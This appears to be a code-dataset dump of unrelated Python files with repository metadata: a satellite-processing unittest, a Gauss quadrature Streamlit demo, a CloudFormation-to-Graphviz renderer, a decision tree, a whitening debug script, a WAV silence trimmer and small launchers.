        with open(expected_log_file, 'r', encoding='utf-8') as infile:
            log_contents = infile.read()
        self.assertIn(f"Input directory {abspath('dswx_pge_test/scratch_dir')} "
                      f"does not contain any tif files", log_contents)
        # Lastly, check that a file that exists but is not a tif is caught
        # (the runconfig itself serves as a convenient non-.tif file)
        input_files_group['InputFilePaths'] = [runconfig_path]
        with open(test_runconfig_path, 'w', encoding='utf-8') as runconfig_fh:
            yaml.safe_dump(runconfig_dict, runconfig_fh, sort_keys=False)
        pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
        with self.assertRaises(RuntimeError):
            pge.run()
        expected_log_file = pge.logger.get_file_name()
        self.assertTrue(os.path.exists(expected_log_file))
        with open(expected_log_file, 'r', encoding='utf-8') as infile:
            log_contents = infile.read()
        self.assertIn(f"Input file {abspath(runconfig_path)} does not have "
                      f".tif extension", log_contents)
    finally:
        # Always remove the generated RunConfig so later tests start clean.
        if os.path.exists(test_runconfig_path):
            os.unlink(test_runconfig_path)
def test_dswx_pge_output_validation(self):
    """Test the output validation checks made by DSWxPostProcessorMixin.

    'echo' and 'touch' stand in for the real SAS executable to simulate a
    run that produces no output file and a run that produces an empty one.
    """
    runconfig_path = join(self.data_dir, 'test_dswx_hls_config.yaml')
    test_runconfig_path = join(self.data_dir, 'invalid_dswx_runconfig.yaml')
    with open(runconfig_path, 'r', encoding='utf-8') as stream:
        runconfig_dict = yaml.safe_load(stream)
    product_path_group = runconfig_dict['RunConfig']['Groups']['PGE']['ProductPathGroup']
    primary_executable_group = runconfig_dict['RunConfig']['Groups']['PGE']['PrimaryExecutable']
    # Test with a SAS command that does not produce any output file,
    # post-processor should detect that expected output is missing
    product_path_group['SASOutputFile'] = 'missing_dswx_hls.tif'
    primary_executable_group['ProgramPath'] = 'echo'
    primary_executable_group['ProgramOptions'] = ['hello world']
    with open(test_runconfig_path, 'w', encoding='utf-8') as config_fh:
        yaml.safe_dump(runconfig_dict, config_fh, sort_keys=False)
    try:
        pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
        with self.assertRaises(RuntimeError):
            pge.run()
        expected_output_file = 'dswx_pge_test/output_dir/missing_dswx_hls.tif'
        self.assertFalse(os.path.exists(expected_output_file))
        expected_log_file = pge.logger.get_file_name()
        self.assertTrue(os.path.exists(expected_log_file))
        with open(expected_log_file, 'r', encoding='utf-8') as infile:
            log_contents = infile.read()
        self.assertIn(f"Expected SAS output file {abspath(expected_output_file)} "
                      f"does not exist", log_contents)
        # Test with a SAS command that produces the expected output file, but
        # one that is empty (size 0 bytes). Post-processor should detect this
        # and flag an error
        product_path_group['SASOutputFile'] = 'empty_dswx_hls.tif'
        primary_executable_group['ProgramPath'] = 'touch'
        primary_executable_group['ProgramOptions'] = ['dswx_pge_test/output_dir/empty_dswx_hls.tif']
        with open(test_runconfig_path, 'w', encoding='utf-8') as outfile:
            yaml.safe_dump(runconfig_dict, outfile, sort_keys=False)
        pge = DSWxExecutor(pge_name="DSWxPgeTest", runconfig_path=test_runconfig_path)
        with self.assertRaises(RuntimeError):
            pge.run()
        expected_output_file = 'dswx_pge_test/output_dir/empty_dswx_hls.tif'
        self.assertTrue(os.path.exists(expected_output_file))
        expected_log_file = pge.logger.get_file_name()
        self.assertTrue(os.path.exists(expected_log_file))
        with open(expected_log_file, 'r', encoding='utf-8') as infile:
            log_contents = infile.read()
        self.assertIn(f"SAS output file {abspath(expected_output_file)} was "
                      f"created but is empty", log_contents)
    finally:
        # Clean up the generated RunConfig regardless of test outcome.
        if os.path.exists(test_runconfig_path):
            os.unlink(test_runconfig_path)
# Support direct invocation (python <this file>) in addition to discovery
# by a test runner.
if __name__ == "__main__":
    unittest.main()
| 0 | 0 | 0 |
a1ae20c0408cb75fb662bcc96a4b99d348f868e8 | 1,510 | py | Python | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | src/tasks/task6/6_1_complex_gauss.py | Furetur/ComputationalMath | 5c49adf97eb3408bb4ae10be04f0df6988f73ac0 | [
"MIT"
] | null | null | null | import sys
from typing import List, Callable, Protocol
import pandas as pd
import streamlit as st
import seaborn as sns
import sympy as sp
from sympy.abc import x as x_symbol
import matplotlib.pyplot as plt
import numpy as np
from numpy.polynomial import Polynomial
sys.path.append('')
sys.path.append('../../..')
from src.common.qf.complex_gauss import calc_complex_gauss
from src.common.utils import integrate, err, rel_err
from src.common.qf.qf_utils import calc_qf, plot_qf
from src.common.polynomial.legendre import legendres
from src.common.qf.gauss import gauss_qf
from src.common.segment import Segment
from src.common.streamlit import function_input, segment_input
# Streamlit page for task 6.1: composite Gauss quadrature demo.
st.write("# 6.1 Применение составной КФ Гаусса")
with st.form('main'):
    # User-supplied integrand f(x) and integration segment [a, b].
    f_expr, f_lambda = function_input("sqrt(1-x)*sin(x)")
    a, b = segment_input(default_a=0.0, default_b=1.0)
    st.form_submit_button()
# Quadrature parameters: N nodes per sub-segment, m sub-segments.
N = st.sidebar.number_input(min_value=1, value=2 , label='N: кол-во узлов')
m = st.sidebar.number_input(min_value=1, label='m: кол-во разбиений')
domain = Segment(a, b)
partitions = domain.split(m)  # m sub-segments for the composite rule
st.write(f_expr)
J = integrate(f_expr, domain)  # reference value of the integral
J_approx = calc_complex_gauss(N, partitions, f_lambda)  # composite Gauss estimate
with st.expander(label='Более подробно'):
    # Show the N-point Gauss nodes and weights used on each sub-segment.
    nodes, coefs = gauss_qf(N)
    gauss_df = pd.DataFrame({"Узлы": nodes, "Коэф.": coefs})
    st.dataframe(gauss_df)
st.latex(f"J = {J}")
st.latex(f"J_{{approx}} = {J_approx}")
st.latex(f"Error = {err(J, J_approx)}")
st.latex(f"Rel.Error = {rel_err(J, J_approx)}\%")
| 28.490566 | 75 | 0.739735 | import sys
from typing import List, Callable, Protocol
import pandas as pd
import streamlit as st
import seaborn as sns
import sympy as sp
from sympy.abc import x as x_symbol
import matplotlib.pyplot as plt
import numpy as np
from numpy.polynomial import Polynomial
sys.path.append('')
sys.path.append('../../..')
from src.common.qf.complex_gauss import calc_complex_gauss
from src.common.utils import integrate, err, rel_err
from src.common.qf.qf_utils import calc_qf, plot_qf
from src.common.polynomial.legendre import legendres
from src.common.qf.gauss import gauss_qf
from src.common.segment import Segment
from src.common.streamlit import function_input, segment_input
# Streamlit page for task 6.1: composite Gauss quadrature demo.
st.write("# 6.1 Применение составной КФ Гаусса")
with st.form('main'):
    # User-supplied integrand f(x) and integration segment [a, b].
    f_expr, f_lambda = function_input("sqrt(1-x)*sin(x)")
    a, b = segment_input(default_a=0.0, default_b=1.0)
    st.form_submit_button()
# Quadrature parameters: N nodes per sub-segment, m sub-segments.
N = st.sidebar.number_input(min_value=1, value=2 , label='N: кол-во узлов')
m = st.sidebar.number_input(min_value=1, label='m: кол-во разбиений')
domain = Segment(a, b)
partitions = domain.split(m)  # m sub-segments for the composite rule
st.write(f_expr)
J = integrate(f_expr, domain)  # reference value of the integral
J_approx = calc_complex_gauss(N, partitions, f_lambda)  # composite Gauss estimate
with st.expander(label='Более подробно'):
    # Show the N-point Gauss nodes and weights used on each sub-segment.
    nodes, coefs = gauss_qf(N)
    gauss_df = pd.DataFrame({"Узлы": nodes, "Коэф.": coefs})
    st.dataframe(gauss_df)
st.latex(f"J = {J}")
st.latex(f"J_{{approx}} = {J_approx}")
st.latex(f"Error = {err(J, J_approx)}")
st.latex(f"Rel.Error = {rel_err(J, J_approx)}\%")
| 0 | 0 | 0 |
a934dbcd7616fcb30469f78f0fe63ba5fc4a0dd7 | 6,084 | py | Python | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null | cfnviz/renderers.py | devquixote/cfnviz | e5363cbf1efef72acbe9e0cad1bc4374b682085c | [
"MIT"
] | null | null | null |
default_values = {
"ranksep": "0.4",
"nodesep": "0.4",
"font": "arial",
"bold_font": "arial bold",
"fontcolor": "grey15",
"edgecolor": "grey15",
"clear": "white"
}
digraph_template = """
digraph cfn_template {{
graph [
rankdir="TB";
fontname="{font}";
]
concentrate=true;
ratio=compress;
ranksep="{ranksep}";
nodesep="{nodesep}";
node [shape=box,fontname="{font}",fontcolor="{fontcolor}"];
edge [arrowhead="vee",color="{edgecolor}"];
subgraph everything_but_resources {{
color="{clear}";
{outputs_cluster}
{conditions_cluster}
{mappings_cluster}
{parameters_cluster}
{non_resource_edges} [style=invis]
}}
{resources_cluster}
}}
"""
subgraph_template = """
subgraph cluster_{label} {{
label="{label}";
fontsize="36";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=record]
{element_type} [
label="{{{elements}}}";
]
}}
"""
resource_subgraph_template = """
subgraph cluster_resources {{
label="Resources";
fontsize="36";
fontname="{font}";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=none]
{resource_nodes}
{resource_edges}
}}
"""
resource_type_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" COLSPAN="2"><FONT POINT-SIZE="10">{type_path}</FONT><BR/>{type}</TD>
</TR>
'''
resource_name_row_view = '''
<TR>
<TD BORDER="0" CELLPADDING="10" COLSPAN="2"><FONT POINT-SIZE="28" FACE="{bold_font}" COLOR="{clear}">{name}</FONT></TD>
</TR>
'''
resource_attribute_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" VALIGN="top" ALIGN="RIGHT">{name}:</TD>
<TD BORDER="0" BGCOLOR="{clear}" ALIGN="LEFT">{values}</TD>
</TR>
'''
resource_node_view = '''
{name} [
label=<
<TABLE BORDER="1" BGCOLOR="grey65" COLOR="grey15" CELLPADDING="3" CELLSPACING="0">
{type_row}
{name_row}
{attribute_rows}
</TABLE>
>
]
'''
| 28.297674 | 131 | 0.607002 |
default_values = {
"ranksep": "0.4",
"nodesep": "0.4",
"font": "arial",
"bold_font": "arial bold",
"fontcolor": "grey15",
"edgecolor": "grey15",
"clear": "white"
}
digraph_template = """
digraph cfn_template {{
graph [
rankdir="TB";
fontname="{font}";
]
concentrate=true;
ratio=compress;
ranksep="{ranksep}";
nodesep="{nodesep}";
node [shape=box,fontname="{font}",fontcolor="{fontcolor}"];
edge [arrowhead="vee",color="{edgecolor}"];
subgraph everything_but_resources {{
color="{clear}";
{outputs_cluster}
{conditions_cluster}
{mappings_cluster}
{parameters_cluster}
{non_resource_edges} [style=invis]
}}
{resources_cluster}
}}
"""
subgraph_template = """
subgraph cluster_{label} {{
label="{label}";
fontsize="36";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=record]
{element_type} [
label="{{{elements}}}";
]
}}
"""
resource_subgraph_template = """
subgraph cluster_resources {{
label="Resources";
fontsize="36";
fontname="{font}";
fontcolor="grey35";
color="{clear}";
node [fontsize=14, shape=none]
{resource_nodes}
{resource_edges}
}}
"""
resource_type_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" COLSPAN="2"><FONT POINT-SIZE="10">{type_path}</FONT><BR/>{type}</TD>
</TR>
'''
resource_name_row_view = '''
<TR>
<TD BORDER="0" CELLPADDING="10" COLSPAN="2"><FONT POINT-SIZE="28" FACE="{bold_font}" COLOR="{clear}">{name}</FONT></TD>
</TR>
'''
resource_attribute_row_view = '''
<TR>
<TD BORDER="0" BGCOLOR="{clear}" VALIGN="top" ALIGN="RIGHT">{name}:</TD>
<TD BORDER="0" BGCOLOR="{clear}" ALIGN="LEFT">{values}</TD>
</TR>
'''
resource_node_view = '''
{name} [
label=<
<TABLE BORDER="1" BGCOLOR="grey65" COLOR="grey15" CELLPADDING="3" CELLSPACING="0">
{type_row}
{name_row}
{attribute_rows}
</TABLE>
>
]
'''
class DotRenderer(object):
    """Renders a parsed CloudFormation template model as Graphviz dot source.

    Instances are callable: ``DotRenderer(model)()`` returns the complete
    dot document as a string, assembled from the module-level templates.
    """

    def __init__(self, model):
        self.model = model

    def __call__(self):
        """Assemble and return the full digraph document for the model."""
        ctx = dict(default_values)
        ctx['outputs_cluster'] = self.__render_subgraph(
            "Outputs", "Outputs", [o.name for o in self.model.outputs])
        ctx['conditions_cluster'] = self.__render_subgraph(
            "Conditions", "Conditions", [c.name for c in self.model.conditions])
        ctx['mappings_cluster'] = self.__render_subgraph(
            "Mappings", "Mappings", [m.key for m in self.model.mappings])
        ctx['parameters_cluster'] = self.__render_subgraph(
            "Parameters", "Parameters", [p.name for p in self.model.parameters])
        ctx['non_resource_edges'] = self.__render_non_resource_edges()
        ctx['resources_cluster'] = self.__render_resources_subgraph()
        return digraph_template.format(**ctx)

    def __render_non_resource_edges(self):
        # Invisible edge chain (Parameters -> Mappings -> Conditions -> Outputs)
        # linking whichever of the non-resource clusters are present.
        ordering = (
            ('Parameters', self.model.parameters),
            ('Mappings', self.model.mappings),
            ('Conditions', self.model.conditions),
            ('Outputs', self.model.outputs),
        )
        return " -> ".join(label for label, members in ordering if members)

    def __render_resources_subgraph(self):
        ctx = dict(default_values)
        ctx['resource_nodes'] = self.__render_resources()
        ctx['resource_edges'] = self.__render_edges()
        return resource_subgraph_template.format(**ctx)

    def __render_resources(self):
        # Emit nodes ordered by attribute count (fewest attributes first).
        ordered = sorted(self.model.resources.values(),
                         key=lambda res: len(res.attributes))
        rendered = []
        for res in ordered:
            ctx = dict(default_values)
            ctx['name'] = res.name
            ctx['type_row'] = self.__render_type_row(res.type)
            ctx['name_row'] = self.__render_name_row(res.name)
            ctx['attribute_rows'] = self.__render_attribute_rows(res.attributes)
            rendered.append(resource_node_view.format(**ctx))
        return "\n".join(rendered)

    def __render_type_row(self, resource_type):
        # Split e.g. "AWS::S3::Bucket" into leaf type and namespace path.
        *namespace, leaf = resource_type.split("::")
        ctx = dict(default_values)
        ctx['type'] = leaf
        ctx['type_path'] = "::".join(namespace)
        return resource_type_row_view.format(**ctx)

    def __render_name_row(self, resource_name):
        ctx = dict(default_values, name=resource_name)
        return resource_name_row_view.format(**ctx)

    def __render_attribute_rows(self, attributes):
        rows = []
        for attr in attributes.values():
            ctx = dict(default_values)
            ctx['name'] = attr.name
            ctx['values'] = '<BR ALIGN="LEFT"/>'.join(attr.refers_to)
            rows.append(resource_attribute_row_view.format(**ctx))
        return "\n".join(rows)

    def __render_subgraph(self, label, element_type, elements):
        # Absent sections contribute nothing to the document.
        if not elements:
            return ''
        ctx = dict(default_values)
        ctx['label'] = label
        ctx['element_type'] = element_type
        ctx['elements'] = "|".join(elements)
        return subgraph_template.format(**ctx)

    def __render_edges(self):
        edge_view = "    {source} -> {dest}"
        return "\n".join(edge_view.format(source=edge.source, dest=edge.dest)
                         for edge in self.model.resource_edges)
| 3,676 | 5 | 292 |
455c63f3f9be56967fa465ef942df3ac3f71873f | 197 | py | Python | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 13 | 2018-08-07T21:56:08.000Z | 2021-12-06T17:53:37.000Z | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 360 | 2018-07-24T16:35:26.000Z | 2022-03-23T15:28:56.000Z | scripts/poop_count.py | k1o0/iblrig | 9177b852b344a9bbc26e4a4aeb5f0182bd8a9b25 | [
"MIT"
] | 15 | 2019-03-12T16:25:05.000Z | 2021-09-06T10:30:24.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, January 31st 2019, 4:12:19 pm
from iblrig.poop_count import poop
if __name__ == "__main__":
poop()
| 19.7 | 48 | 0.670051 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Niccolò Bonacchi
# @Date: Thursday, January 31st 2019, 4:12:19 pm
from iblrig.poop_count import poop
if __name__ == "__main__":
poop()
| 0 | 0 | 0 |
eb38b982a137c05786ede3bb3be0701c9f445431 | 2,349 | py | Python | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | 1 | 2019-07-31T08:44:45.000Z | 2019-07-31T08:44:45.000Z | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | null | null | null | machine_learning/algorithms/decision_tree.py | z-yin/Leetcode-learning | e84c2fb067b767ed5f24d8736274c7ebce5dc00e | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
if __name__ == "__main__":
d = pd.read_csv('your.txt')
dt = DecisionTree(d, 'ID3')
print(dt.tree)
| 31.32 | 69 | 0.530013 | import numpy as np
import pandas as pd
class DecisionTree:
def __init__(self, df, method='C4.5', eps=0.01):
self.df = pd.DataFrame(df)
self.eps = eps
self.method = method
self.tree = self.create_tree(self.df)
def entropy(self, count):
p = count / count.sum()
p = p[p != 0]
return -p.dot(np.log2(p))
def conditional_entropy(self, cb):
w = cb.sum(1) / cb.to_numpy().sum()
HDi = cb.apply(self.entropy, 'columns')
return w.dot(HDi)
def weight_entropy(self, cbs):
w = [cb.sum(1) / cb.to_numpy().sum() for cb in cbs]
enpy = [-i.dot(np.log2(i)) for i in w]
return np.array(enpy)
def split_data(self, df):
labels = df.iloc[:, -1]
data = df.iloc[:, :-1]
# calculate HD
ck = labels.groupby(labels).count()
HD = self.entropy(ck)
# calculate HDA
cbs = [pd.crosstab(data.iloc[:, i], labels)
for i in range(data.columns.size)]
HDA = np.array([self.conditional_entropy(cb) for cb in cbs])
if self.method == 'ID3':
g = HD - HDA
elif self.method == 'C4.5':
# calculate HAD, not HDA
HAD = self.weight_entropy(cbs)
g = np.ndarray(shape=HAD.shape)
np.divide((HD - HDA), HAD, g)
# if largest gain is less than eps
if g.max() < self.eps:
return labels.mode().iloc[0]
split_index = g.argmax()
name = df.columns[split_index]
children = df.groupby(df.iloc[:, split_index])
return ((name, i, d.drop(name, axis=1)) for i, d in children)
def create_tree(self, df):
if df.iloc[:, -1].unique().size == 1: # single class
return df.iloc[0, -1]
if df.columns.size == 1: # A = empty
return df.mode().iloc[0, 0]
sub_df = self.split_data(df)
# if largest gain is less than eps
if isinstance(sub_df, str):
return sub_df
# if largest gain is larger than eps
res = {}
for name, i, d in sub_df:
if name not in res:
res[name] = {}
res[name][i] = self.create_tree(d)
return res
if __name__ == "__main__":
d = pd.read_csv('your.txt')
dt = DecisionTree(d, 'ID3')
print(dt.tree)
| 2,015 | -2 | 184 |
f30258d9ca96fed4ef315dd00ebade4bfd523f26 | 2,947 | py | Python | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | models/utils/tmp.py | PatrickHua/FeatureDecorrelationSSL | 408bd9e8d71a2a1962a3ca4d8d9a2476bf561734 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
from whiten_norm import Whitening1d, whiten_tensor_svd
from decorrelated_batch_norm import DBN
# from norm_tests import get_corrcoef
file = "/Users/tiany/Downloads/input.pkl"
with open(file, 'rb') as f:
data = pickle.load(f)
# wn = Whitening1d(data.shape[1], eps=0)
dbn = DBN(data.shape[1], eps=0, num_channels=1, dim=2, affine=False)
# x =
# data = torch.rand_like(torch.from_numpy(data)).numpy()
# data = torch.rand((64, 512)).numpy()
# print(np.abs(np.corrcoef(data, rowvar=False)).mean())
print(get_corrcoef(data))
# y = whiten_tensor_svd(torch.from_numpy(data)).numpy()
# y = wn(torch.from_numpy(data)).numpy()
breakpoint()
y = dbn(torch.from_numpy(data)).numpy()
# print(np.abs(np.corrcoef(y, rowvar=False)).mean())
print(get_corrcoef(y))
breakpoint()
x = np.array([
[-1, 0],
[1, 0]
])
print(get_corrcoef(x))
print(np.cov(x, rowvar=False))
# class DecorBatchNorm1d(nn.Module):
# def __init__(self, num_features, num_groups=32, num_channels=0, ndim=2, eps=1e-5, momentum=0.1, gamma=True, beta=True):
# super(DecorBatchNorm1d, self).__init__()
# if num_channels > 0:
# num_groups = num_features // num_channels
# self.num_features = num_features
# self.num_groups = num_groups
# assert self.num_features % self.num_groups == 0
# self.dim = dim
# self.eps = eps
# self.mmomentum = momentum
# # self.affine = affine
# self.gamma = gamma
# self.beta = beta
# self.mode = mode
# self.ndim = ndim
# # if self.affine:
# # self.weight = nn.Parameter(torch.Tensor(self.num_features))
# # self.bias = nn.Parameter(torch.Tensor(self.num_features))
# self.register_parameter('weight', nn.Parameter(torch.ones(num_features)) if gamma else None)
# self.register_parameter('bias', nn.Parameter(torch.zeros(num_features)) if beta else None)
# self.register_buffer('running_mean', torch.zeros(num_features))
# self.register_buffer('running_projection', torch.eye(num_features))
# self.reset_parameter()
# def reset_parameter(self):
# if self.gamma: nn.init.ones_(self.weight)
# if self.beta: nn.init.zeros_(self.bias)
# def forward(self, x):
# if self.training:
# mean = x.mean(dim=1, keepdim=True)
# self.running_mean = (1-self.momentum) * self.running_mean + self.mmomentum * mean
# x = x - mean
# cov = x.matmut(x.t()) / x.size(1) + self.eps * torch.eye()
# u, eig, _ = cov.cpu().svd()
| 31.351064 | 125 | 0.633526 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pickle
from whiten_norm import Whitening1d, whiten_tensor_svd
from decorrelated_batch_norm import DBN
# from norm_tests import get_corrcoef
def get_corrcoef(x):
    """Mean absolute off-diagonal correlation of the columns of ``x``.

    The diagonal (self-correlations) is zeroed before averaging, so the
    result is the mean of |corr| over the full matrix with the diagonal
    contributing zeros.
    """
    abs_corr = np.abs(np.corrcoef(x, rowvar=False))
    np.fill_diagonal(abs_corr, 0)
    return abs_corr.mean()
# Exploratory/debug script: compare the mean absolute feature correlation of
# raw activations against DBN-whitened ones.  The hard-coded path and the
# breakpoint() calls mark this as scratch code, not production.
file = "/Users/tiany/Downloads/input.pkl"
with open(file, 'rb') as f:
    data = pickle.load(f)  # presumably an (N, features) float array — confirm
# wn = Whitening1d(data.shape[1], eps=0)
dbn = DBN(data.shape[1], eps=0, num_channels=1, dim=2, affine=False)
# x =
# data = torch.rand_like(torch.from_numpy(data)).numpy()
# data = torch.rand((64, 512)).numpy()
# print(np.abs(np.corrcoef(data, rowvar=False)).mean())
print(get_corrcoef(data))  # correlation of the raw features
# y = whiten_tensor_svd(torch.from_numpy(data)).numpy()
# y = wn(torch.from_numpy(data)).numpy()
breakpoint()
y = dbn(torch.from_numpy(data)).numpy()
# print(np.abs(np.corrcoef(y, rowvar=False)).mean())
print(get_corrcoef(y))  # expected lower if DBN decorrelates — verify
breakpoint()
# Tiny hand-made check; the second column is constant, so its correlation
# is undefined (expect a NaN/divide warning from np.corrcoef).
x = np.array([
    [-1, 0],
    [1, 0]
])
print(get_corrcoef(x))
print(np.cov(x, rowvar=False))
# class DecorBatchNorm1d(nn.Module):
# def __init__(self, num_features, num_groups=32, num_channels=0, ndim=2, eps=1e-5, momentum=0.1, gamma=True, beta=True):
# super(DecorBatchNorm1d, self).__init__()
# if num_channels > 0:
# num_groups = num_features // num_channels
# self.num_features = num_features
# self.num_groups = num_groups
# assert self.num_features % self.num_groups == 0
# self.dim = dim
# self.eps = eps
# self.mmomentum = momentum
# # self.affine = affine
# self.gamma = gamma
# self.beta = beta
# self.mode = mode
# self.ndim = ndim
# # if self.affine:
# # self.weight = nn.Parameter(torch.Tensor(self.num_features))
# # self.bias = nn.Parameter(torch.Tensor(self.num_features))
# self.register_parameter('weight', nn.Parameter(torch.ones(num_features)) if gamma else None)
# self.register_parameter('bias', nn.Parameter(torch.zeros(num_features)) if beta else None)
# self.register_buffer('running_mean', torch.zeros(num_features))
# self.register_buffer('running_projection', torch.eye(num_features))
# self.reset_parameter()
# def reset_parameter(self):
# if self.gamma: nn.init.ones_(self.weight)
# if self.beta: nn.init.zeros_(self.bias)
# def forward(self, x):
# if self.training:
# mean = x.mean(dim=1, keepdim=True)
# self.running_mean = (1-self.momentum) * self.running_mean + self.mmomentum * mean
# x = x - mean
# cov = x.matmut(x.t()) / x.size(1) + self.eps * torch.eye()
# u, eig, _ = cov.cpu().svd()
| 208 | 0 | 24 |
181544942dd95274c5af256c8de449f2402bce01 | 3,857 | py | Python | trimmer.py | ktho22/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | 17 | 2020-08-31T09:36:54.000Z | 2022-02-15T03:15:09.000Z | trimmer.py | Lukelluke/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | null | null | null | trimmer.py | Lukelluke/vctts | 84e8bc6c4b5586aa319c7c21c4325f879f2cd3ba | [
"MIT"
] | 4 | 2020-09-19T11:50:24.000Z | 2022-02-19T14:57:43.000Z | import webrtcvad, os, wave, contextlib, collections, argparse
if __name__=='__main__':
parser = argparse.ArgumentParser(description='training script')
parser.add_argument('--in_dir', type=str, help='type dataset for trimming')
parser.add_argument('--out_dir', type=str, help='type dataset for trimming')
args = parser.parse_args()
if not args.in_dir or not args.out_dir:
parser.error('--in_dir and --out_dir should be given')
in_dir = args.in_dir
out_dir = args.out_dir
# ------ trimming scilence using VAD
os.makedirs(out_dir, exist_ok=True)
trim(in_dir, out_dir)
| 38.188119 | 104 | 0.618097 | import webrtcvad, os, wave, contextlib, collections, argparse
def read_wave(path):
with contextlib.closing(wave.open(path, 'rb')) as wf:
num_channels = wf.getnchannels()
assert num_channels == 1
sample_width = wf.getsampwidth()
assert sample_width == 2
sample_rate = wf.getframerate()
pcm_data = wf.readframes(wf.getnframes())
return pcm_data, sample_rate
def write_wave(path, audio, sample_rate):
with contextlib.closing(wave.open(path, 'wb')) as wf:
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(sample_rate)
wf.writeframes(audio)
class Frame(object):
def __init__(self, bytes, timestamp, duration):
self.bytes = bytes
self.timestamp = timestamp
self.duration = duration
def frame_generator(frame_duration_ms, audio, sample_rate):
n = int(sample_rate * (frame_duration_ms / 1000.0) * 2)
offset = 0
timestamp = 0.0
duration = (float(n) / sample_rate) / 2.0
output = []
while offset + n < len(audio):
output.append(Frame(audio[offset:offset + n], timestamp, duration))
timestamp += duration
offset += n
return output
def vad_collector(sample_rate, frame_duration_ms, padding_duration_ms, frames, filename):
num_padding_frames = int(padding_duration_ms / frame_duration_ms)
ring_buffer = collections.deque(maxlen=num_padding_frames)
triggered = False
aggressiveness = 3
while aggressiveness >= 0:
vad = webrtcvad.Vad(aggressiveness)
voiced_frames = []
for frame in frames:
if not triggered: #unvoiced part
ring_buffer.append(frame)
num_voiced = len([f for f in ring_buffer
if vad.is_speech(f.bytes, sample_rate)])
if num_voiced > 0.3 * ring_buffer.maxlen:
triggered = True
voiced_frames.extend(ring_buffer)
ring_buffer.clear()
else: #voiced part
voiced_frames.append(frame)
ring_buffer.append(frame)
num_unvoiced = len([f for f in ring_buffer
if not vad.is_speech(f.bytes, sample_rate)])
if num_unvoiced > 0.3 * ring_buffer.maxlen:
triggered = False
ring_buffer.clear()
if voiced_frames:
return b''.join([f.bytes for f in voiced_frames])
aggressiveness -= 1
print('Could not find voice activity at', filename)
return b''.join([f.bytes for f in frames])
def trim(rDirectory, wDirectory):
frame_duration_ms = 30
padding_duration_ms = 300
# print("read dir: ", rDirectory)
for root, dirnames, filenames in os.walk(rDirectory):
for filename in filenames:
if filename[-4:] == '.wav':
rf = os.path.join(root, filename)
audio, sample_rate = read_wave(rf)
frames = frame_generator(frame_duration_ms, audio, sample_rate)
segment = vad_collector(sample_rate, frame_duration_ms, padding_duration_ms, frames, rf)
wPath = str(wDirectory + '/' + filename)
write_wave(wPath, segment, sample_rate)
if __name__=='__main__':
parser = argparse.ArgumentParser(description='training script')
parser.add_argument('--in_dir', type=str, help='type dataset for trimming')
parser.add_argument('--out_dir', type=str, help='type dataset for trimming')
args = parser.parse_args()
if not args.in_dir or not args.out_dir:
parser.error('--in_dir and --out_dir should be given')
in_dir = args.in_dir
out_dir = args.out_dir
# ------ trimming scilence using VAD
os.makedirs(out_dir, exist_ok=True)
trim(in_dir, out_dir)
| 3,066 | -1 | 164 |
1d9520a85e48fe18366f4416970e0a635c02e35b | 299 | py | Python | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 116 | 2015-01-06T17:56:12.000Z | 2021-08-16T06:33:01.000Z | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 17 | 2015-02-17T17:50:53.000Z | 2020-01-15T08:05:46.000Z | python/setadm.py | beaglecode/skytools | 01851e5e21f3f923b6266285596db6d64958eb74 | [
"0BSD"
] | 51 | 2015-02-18T16:12:13.000Z | 2021-03-07T19:22:58.000Z | #! /usr/bin/env python
"""SetAdmin launcher.
"""
import sys
import pkgloader
pkgloader.require('skytools', '3.0')
import pgq.cascade.admin
if __name__ == '__main__':
script = pgq.cascade.admin.CascadeAdmin('cascade_admin', 'node_db', sys.argv[1:], worker_setup = False)
script.start()
| 17.588235 | 107 | 0.698997 | #! /usr/bin/env python
"""SetAdmin launcher.
"""
import sys
import pkgloader
pkgloader.require('skytools', '3.0')
import pgq.cascade.admin
if __name__ == '__main__':
